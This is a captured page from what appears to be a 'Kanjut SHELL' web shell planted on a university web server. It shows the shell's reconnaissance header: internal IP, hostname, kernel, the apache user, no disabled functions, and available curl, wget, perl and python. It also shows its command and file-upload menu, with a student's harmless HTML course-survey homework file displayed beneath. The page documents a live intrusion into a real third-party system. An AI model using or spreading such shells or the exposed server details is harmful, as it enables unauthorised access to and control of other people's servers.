Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.39.176
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/tasantos/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/tasantos/public_html/hw8.html
<!--
	Author:		Tara Santos
	Title:		hw8.html
	Subject:	CS480
	Due Date:	April 6
	Instructor:	Dr. Wang
	Purpose:	
	
-->

<HTML>
<HEAD>
<TITLE>Course Survey</TITLE>
<body background="http://www.negative99.com/images/wallpaper/circuitboard_wallpaper.jpg">
<CENTER><font face="impact" size=5 color="660033">
Welcome to the  Computer Science Course Survey</font><br></center>
<HR>
<FORM action=hw8survey.php method=post>
<br>
Please input your first name: 
<input type=text size=15 name=firstname><br>

<pre>Select your gender:<br> 
<input type=radio name=gender value=Male checked> Male
<input type=radio name=gender value=Female> Female
</pre>

Select your grade:
<pre><input type=radio name=grade value=Freshman checked> Freshman
<input type=radio name=grade value=Sophomore> Sophomore
<input type=radio name=grade value=Junior> Junior
<input type=radio name=grade value=Senior> Senior
</pre>

Input your course number:
<input type=text size=15 name=course><br>
<br>
<br>
<center><input type=submit value=Continue to Survey>
<input type=reset value=Clear></center>
</FORM>
</HTML>
</HEAD>
</body>

Stv3n404 - 2023